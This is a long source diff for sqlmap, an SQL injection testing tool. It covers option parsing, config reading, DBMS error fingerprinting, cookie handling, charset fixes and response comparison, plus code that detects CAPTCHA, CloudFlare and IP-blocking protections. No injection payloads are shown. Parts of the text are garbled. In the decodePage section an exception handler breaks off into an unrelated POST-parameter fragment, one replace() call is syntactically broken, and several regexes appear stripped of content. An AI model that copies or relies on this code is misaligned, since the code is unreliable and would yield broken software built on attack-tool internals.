except ValueError, ex: raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message - # Hide non-basic options in basic help case for i in xrange(len(argv)): if argv[i] == "-hh": argv[i] = "-h" + elif len(argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((argv[i].split('=', 1)[-1].strip() or ' ')[0], argv[i][-1])): + dataToStdout("[!] copy-pasting illegal (non-console) quote characters from Internet is, well, illegal (%s)\n" % argv[i]) + raise SystemExit + elif len(argv[i]) > 1 and u"\uff0c" in argv[i].split('=', 1)[-1]: + dataToStdout("[!] copy-pasting illegal (non-console) comma characters from Internet is, well, illegal (%s)\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w=.+", argv[i]): + dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) + raise SystemExit elif argv[i] == "-H": if i + 1 < len(argv): extraHeaders.append(argv[i + 1]) @@ -877,7 +927,7 @@ def cmdLineParser(): elif argv[i] == "--version": print VERSION_STRING.split('/')[-1] raise SystemExit - elif argv[i] == "-h": + elif argv[i] in ("-h", "--help"): advancedHelp = False for group in parser.option_groups[:]: found = False @@ -889,14 +939,22 @@ def cmdLineParser(): if not found: parser.option_groups.remove(group) + for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)): + try: + if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit(): + conf.verbose = verbosity.count('v') + 1 + del argv[argv.index(verbosity)] + except (IndexError, ValueError): + pass + try: (args, _) = parser.parse_args(argv) except UnicodeEncodeError, ex: - print "\n[!] %s" % ex.object.encode("unicode-escape") + dataToStdout("\n[!] %s\n" % ex.object.encode("unicode-escape")) raise SystemExit except SystemExit: if "-h" in argv and not advancedHelp: - print "\n[!] to see full list of options run with '-hh'" + dataToStdout("\n[!] to see full list of options run with '-hh'\n") raise if extraHeaders: @@ -915,9 +973,9 @@ def cmdLineParser(): if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.pickledOptions, args.sitemapUrl)): + args.purgeOutput, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help" + errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) return args @@ -928,7 +986,7 @@ def cmdLineParser(): except SystemExit: # Protection against Windows dummy double clicking if IS_WIN: - print "\nPress Enter to continue...", + dataToStdout("\nPress Enter to continue...") raw_input() raise diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index 507cce17b..7f522a999 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -1,30 +1,27 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -import codecs - -from ConfigParser import MissingSectionHeaderError -from ConfigParser import ParsingError - from lib.core.common import checkFile +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import openFile from lib.core.common import unArrayizeValue from lib.core.common import UnicodeRawConfigParser +from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import logger +from lib.core.enums import OPTION_TYPE from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapSyntaxException from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING config = None -def configFileProxy(section, option, boolean=False, integer=False): +def configFileProxy(section, option, datatype): """ Parse configuration file and save settings into the configuration advanced dictionary. @@ -34,10 +31,12 @@ def configFileProxy(section, option, boolean=False, integer=False): if config.has_option(section, option): try: - if boolean: + if datatype == OPTION_TYPE.BOOLEAN: value = config.getboolean(section, option) if config.get(section, option) else False - elif integer: + elif datatype == OPTION_TYPE.INTEGER: value = config.getint(section, option) if config.get(section, option) else 0 + elif datatype == OPTION_TYPE.FLOAT: + value = config.getfloat(section, option) if config.get(section, option) else 0.0 else: value = config.get(section, option) except ValueError, ex: @@ -73,23 +72,21 @@ def configFileParser(configFile): config = UnicodeRawConfigParser() config.readfp(configFP) except Exception, ex: - errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): errMsg = "missing a mandatory section 'Target' in the configuration file" raise SqlmapMissingMandatoryOptionException(errMsg) - condition = not config.has_option("Target", "direct") - condition &= not config.has_option("Target", "url") - condition &= not config.has_option("Target", "logFile") - condition &= not config.has_option("Target", "bulkFile") - condition &= not config.has_option("Target", "googleDork") - condition &= not config.has_option("Target", "requestFile") - condition &= not config.has_option("Target", "sitemapUrl") - condition &= not config.has_option("Target", "wizard") + mandatory = False - if condition: + for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "sitemapUrl", "wizard"): + if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): + mandatory = True + break + + if not mandatory: errMsg = "missing a mandatory option in the configuration file " errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -97,8 +94,4 @@ def configFileParser(configFile): for family, optionData in optDict.items(): for option, datatype in optionData.items(): datatype = unArrayizeValue(datatype) - - boolean = datatype == "boolean" - integer = datatype == "integer" - - configFileProxy(family, option, boolean, integer) + configFileProxy(family, option, datatype) diff --git a/lib/parse/handler.py b/lib/parse/handler.py index 04950ecbd..664da4233 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 4ca97779c..8e073ce4a 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/html.py b/lib/parse/html.py index 3c40920e6..f0ee8fcd5 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler): ContentHandler.__init__(self) self._dbms = None - self._page = page + self._page = (page or "") + self._lower_page = self._page.lower() self.dbms = None @@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler): threadData.lastErrorPage = (threadData.lastRequestUID, self._page) def startElement(self, name, attrs): + if self.dbms: + return + if name == "dbms": self._dbms = attrs.get("value") elif name == "error": - if re.search(attrs.get("regexp"), self._page, re.I): + regexp = attrs.get("regexp") + if regexp not in kb.cache.regex: + keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp)) + keywords = sorted(keywords, key=len) + kb.cache.regex[regexp] = keywords[-1].lower() + + if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I): self.dbms = self._dbms self._markAsErrorPage() @@ -49,6 +59,13 @@ def htmlParser(page): xmlfile = paths.ERRORS_XML handler = HTMLHandler(page) + key = hash(page) + + if key in kb.cache.parsedDbms: + retVal = kb.cache.parsedDbms[key] + if retVal: + handler._markAsErrorPage() + return retVal parseXmlFile(xmlfile, handler) @@ -58,6 +75,8 @@ def htmlParser(page): else: kb.lastParserStatus = None + kb.cache.parsedDbms[key] = handler.dbms + # generic SQL warning/error messages if re.search(r"SQL (warning|error|syntax)", page, re.I): handler._markAsErrorPage() diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index a96867082..c17f41997 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,23 +9,25 @@ import os from xml.etree import ElementTree as et +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import paths from lib.core.datatype import AttribDict from lib.core.exception import SqlmapInstallationException +from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): if tag in ("clause", "where"): text = text.split(',') if isinstance(text, basestring): - text = int(text) if text.isdigit() else str(text) + text = int(text) if text.isdigit() else text elif isinstance(text, list): count = 0 for _ in text: - text[count] = int(_) if _.isdigit() else str(_) + text[count] = int(_) if _.isdigit() else _ count += 1 if len(text) == 1 and tag not in ("clause", "where"): @@ -73,8 +75,8 @@ def loadBoundaries(): try: doc = et.parse(paths.BOUNDARIES_XML) except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg @@ -82,17 +84,14 @@ def loadBoundaries(): parseXmlNode(root) def loadPayloads(): - payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH) - payloadFiles.sort() - - for payloadFile in payloadFiles: + for payloadFile in PAYLOAD_XML_FILES: payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) try: doc = et.parse(payloadFilePath) except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py index 009a63450..efd609d15 100644 --- a/lib/parse/sitemap.py +++ b/lib/parse/sitemap.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -41,8 +41,7 @@ def parseSitemap(url, retVal=None): if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " - test = readInput(message, default="N") - kb.followSitemapRecursion = test[0] in ("y", "Y") + kb.followSitemapRecursion = readInput(message, default='N', boolean=True) if kb.followSitemapRecursion: parseSitemap(url, retVal) else: diff --git a/lib/request/__init__.py b/lib/request/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/request/__init__.py +++ b/lib/request/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/basic.py b/lib/request/basic.py old mode 100755 new mode 100644 index 41829c0ce..9ca84f764 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -13,10 +13,12 @@ import StringIO import struct import zlib +from lib.core.common import Backend from lib.core.common import extractErrorMessage from lib.core.common import extractRegexResult from lib.core.common import getPublicTypeMembers from lib.core.common import getUnicode +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import singleTimeLogMessage @@ -24,6 +26,8 @@ from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import cachedmethod +from lib.core.enums import DBMS from lib.core.enums import HTTP_HEADER from lib.core.enums import PLACE from lib.core.exception import SqlmapCompressionException @@ -33,6 +37,8 @@ from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import META_CHARSET_REGEX from lib.core.settings import PARSE_HEADERS_LIMIT +from lib.core.settings import SELECT_FROM_TABLE_REGEX +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VIEWSTATE_REGEX from lib.parse.headers import headersParser from lib.parse.html import htmlParser @@ -89,19 +95,19 @@ def forgeHeaders(items=None): if cookie.domain_specified and not conf.hostname.endswith(cookie.domain): continue - if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]: + if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]): if conf.loadCookies: conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders)) elif kb.mergeCookies is None: message = "you provided a HTTP %s header value. " % HTTP_HEADER.COOKIE message += "The target URL provided its own cookies within " message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE - message += "Do you want to merge them in futher requests? [Y/n] " - _ = readInput(message, default="Y") - kb.mergeCookies = not _ or _[0] in ("y", "Y") + message += "Do you want to merge them in further requests? [Y/n] " + + kb.mergeCookies = readInput(message, default='Y', boolean=True) if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: - _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x) + _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x) headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: @@ -110,14 +116,14 @@ def forgeHeaders(items=None): conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] elif not kb.testMode: - headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value)) + headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value)) - if kb.testMode and not conf.csrfToken: + if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): resetCookieJar(conf.cj) return headers -def parseResponse(page, headers): +def parseResponse(page, headers, status=None): """ @param page: the page to parse to feed the knowledge base htmlFp (back-end DBMS fingerprint based upon DBMS error messages return @@ -129,8 +135,9 @@ def parseResponse(page, headers): headersParser(headers) if page: - htmlParser(page) + htmlParser(page if not status else "%s\n\n%s" % (status, page)) +@cachedmethod def checkCharEncoding(encoding, warn=True): """ Checks encoding name, repairs common misspellings and adjusts to @@ -148,17 +155,21 @@ def checkCharEncoding(encoding, warn=True): return encoding # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"} + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() + encoding = encoding.replace(""", "") + # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 + elif "8895" in encoding: + encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: @@ -187,24 +198,35 @@ def checkCharEncoding(encoding, warn=True): encoding = "ascii" elif encoding.find("utf8") > 0: encoding = "utf8" + elif encoding.find("utf-8") > 0: + encoding = "utf-8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] - elif encoding in ("null", "{charset}", "*"): + elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: - codecs.lookup(encoding) - except LookupError: + codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) + except (LookupError, ValueError): if warn: warnMsg = "unknown web page charset '%s'. " % encoding warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None + if encoding: + try: + unicode(randomStr(), encoding) + except: + if warn: + warnMsg = "invalid web page charset '%s'" % encoding + singleTimeLogMessage(warnMsg, logging.WARN, encoding) + encoding = None + return encoding def getHeuristicCharEncoding(page): @@ -212,7 +234,10 @@ def getHeuristicCharEncoding(page): Returns page encoding charset detected by usage of heuristics Reference: http://chardet.feedparser.org/docs/ """ - retVal = detect(page)["encoding"] + + key = hash(page) + retVal = kb.cache.encoding.get(key) or detect(page)["encoding"] + kb.cache.encoding[key] = retVal if retVal: infoMsg = "heuristics detected web page charset '%s'" % retVal @@ -243,15 +268,16 @@ def decodePage(page, contentEncoding, contentType): page = data.read() except Exception, msg: - errMsg = "detected invalid data for declared content " - errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg) - singleTimeLogMessage(errMsg, logging.ERROR) + if "%s" % value, conf.parameters[PLACE.POST]) + else: + msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name + + if not readInput(msg, default='N', boolean=True): + continue + + conf.paramDict[PLACE.POST][name] = value + conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST]) + + if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): + kb.browserVerification = True + warnMsg = "potential browser verification protection mechanism detected" + if re.search(r"(?i)CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""): + for match in re.finditer(r"(?si)", page): + if re.search(r"(?i)captcha", match.group(0)): + kb.captchaDetected = True + warnMsg = "potential CAPTCHA protection mechanism detected" + if re.search(r"(?i)[^<]*CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + break if re.search(BLOCKED_IP_REGEX, page): - errMsg = "it appears that you have been blocked by the target server" - singleTimeLogMessage(errMsg, logging.ERROR) + warnMsg = "it appears that you have been blocked by the target server" + singleTimeWarnMessage(warnMsg) diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index 487dac387..c6e4a3207 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/comparison.py b/lib/request/comparison.py index 0cfb53957..82915d281 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -21,10 +21,12 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DIFF_TOLERANCE from lib.core.settings import HTML_TITLE_REGEX from lib.core.settings import MIN_RATIO +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import MAX_RATIO from lib.core.settings import REFLECTED_VALUE_MARKER from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import URI_HTTP_HEADER from lib.core.threads import getCurrentThreadData def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): @@ -47,17 +49,15 @@ def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: - threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" + threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "" threadData.lastComparisonPage = page + threadData.lastComparisonCode = code if page is None and pageLength is None: return None - seqMatcher = threadData.seqMatcher - seqMatcher.set_seq1(kb.pageTemplate) - if any((conf.string, conf.notString, conf.regexp)): - rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) + rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page) # String to match in page when the query is True and/or valid if conf.string: @@ -75,9 +75,12 @@ def _comparison(page, headers, code, getRatioValue, pageLength): if conf.code: return conf.code == code + seqMatcher = threadData.seqMatcher + seqMatcher.set_seq1(kb.pageTemplate) + if page: # In case of an DBMS error page return None - if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()): + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: return None # Dynamic content lines to be excluded before comparison @@ -107,48 +110,32 @@ def _comparison(page, headers, code, getRatioValue, pageLength): elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - seq1, seq2 = None, None - - if conf.titles: - seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) - seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + if seqMatcher.a and page and seqMatcher.a == page: + ratio = 1 + elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): + ratio = 1.0 * len(seqMatcher.a) / len(page) + if ratio > 1: + ratio = 1. / ratio else: - seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a - seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + seq1, seq2 = None, None - if seq1 is None or seq2 is None: - return None - - seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - - count = 0 - while count < min(len(seq1), len(seq2)): - if seq1[count] == seq2[count]: - count += 1 + if conf.titles: + seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) + seq2 = extractRegexResult(HTML_TITLE_REGEX, page) else: - break - if count: - seq1 = seq1[count:] - seq2 = seq2[count:] + seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a + seq2 = getFilteredPageContent(page, True) if conf.textOnly else page - while True: - try: - seqMatcher.set_seq1(seq1) - except MemoryError: - seq1 = seq1[:len(seq1) / 1024] - else: - break + if seq1 is None or seq2 is None: + return None - while True: - try: - seqMatcher.set_seq2(seq2) - except MemoryError: - seq2 = seq2[:len(seq2) / 1024] - else: - break + seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") + seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - ratio = round(seqMatcher.quick_ratio(), 3) + seqMatcher.set_seq1(seq1) + seqMatcher.set_seq2(seq2) + + ratio = round(seqMatcher.quick_ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content @@ -157,6 +144,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) + if kb.testMode: + threadData.lastComparisonRatio = ratio + # If it has been requested to return the ratio and not a comparison # response if getRatioValue: @@ -165,6 +155,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): elif ratio > UPPER_RATIO_BOUND: return True + elif ratio < LOWER_RATIO_BOUND: + return False + elif kb.matchRatio is None: return None diff --git a/lib/request/connect.py b/lib/request/connect.py index 8914e6cb0..23b6b44ab 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import compiler import httplib import json @@ -30,8 +31,8 @@ from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import asciifyUrl from lib.core.common import calculateDeltaSeconds +from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine -from lib.core.common import cpuThrottle from lib.core.common import dataToStdout from lib.core.common import evaluateCode from lib.core.common import extractRegexResult @@ -40,6 +41,7 @@ from lib.core.common import getCurrentThreadData from lib.core.common import getHeader from lib.core.common import getHostHeader from lib.core.common import getRequestHeader +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import pushValue @@ -78,6 +80,7 @@ from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapTokenException from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER @@ -88,6 +91,8 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE from lib.core.settings import MAX_CONNECTIONS_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS +from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import IS_WIN @@ -95,9 +100,12 @@ from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PERMISSION_DENIED_REGEX from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE +from lib.core.settings import RANDOM_INTEGER_MARKER +from lib.core.settings import RANDOM_STRING_MARKER from lib.core.settings import REPLACEMENT_MARKER from lib.core.settings import TEXT_CONTENT_TYPE_REGEX from lib.core.settings import UNENCODED_ORIGINAL_VALUE +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import WARN_TIME_STDEV from lib.request.basic import decodePage @@ -106,7 +114,6 @@ from lib.request.basic import processResponse from lib.request.direct import direct from lib.request.comparison import comparison from lib.request.methodrequest import MethodRequest -from thirdparty.multipart import multipartpost from thirdparty.odict.odict import OrderedDict from thirdparty.socks.socks import ProxyError @@ -118,7 +125,10 @@ class Connect(object): @staticmethod def _getPageProxy(**kwargs): - return Connect.getPage(**kwargs) + try: + return Connect.getPage(**kwargs) + except RuntimeError: + return None, None, None @staticmethod def _retryProxy(**kwargs): @@ -130,18 +140,21 @@ class Connect(object): logger.warn(warnMsg) conf.proxy = None - setHTTPProxy() + threadData.retriesCount = 0 + + setHTTPHandlers() if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query - warnMsg = "most probably web server instance hasn't recovered yet " + warnMsg = "most likely web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " - warnMsg += "persists please wait for few minutes and rerun " - warnMsg += "without flag T in option '--technique' " + warnMsg += "persists please wait for a few minutes and rerun " + warnMsg += "without flag 'T' in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) + elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " @@ -158,13 +171,12 @@ class Connect(object): warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) + elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) - time.sleep(1) - kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) @@ -183,7 +195,11 @@ class Connect(object): kb.pageCompress = False else: while True: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if not conn: + break + else: + _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if len(_) == MAX_CONNECTION_CHUNK_SIZE: warnMsg = "large response detected. This could take a while" singleTimeWarnMessage(warnMsg) @@ -209,13 +225,13 @@ class Connect(object): if isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) - elif conf.cpuThrottle: - cpuThrottle(conf.cpuThrottle) if conf.offline: return None, None, None - elif conf.dummy: 